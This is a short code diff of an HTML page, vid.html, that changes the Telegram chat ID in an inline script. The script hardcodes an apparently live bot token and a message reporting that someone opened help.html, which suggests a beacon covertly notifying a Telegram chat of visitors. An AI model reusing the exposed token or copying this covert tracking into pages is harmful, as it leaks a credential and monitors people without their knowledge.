--- a/vid.html
+++ b/vid.html
@@ -28,7 +28,7 @@
   <script>
     // Telegram bot details
     const botToken = '7826950594:AAFBygBD_E2PmAITI6zsaPilys7l6i0gWBU';
-    const chatId = '894002841';
+    const chatId = '-1002681260911';
     const message = 'Someone opened help.html';
 
     // Get DOM elements
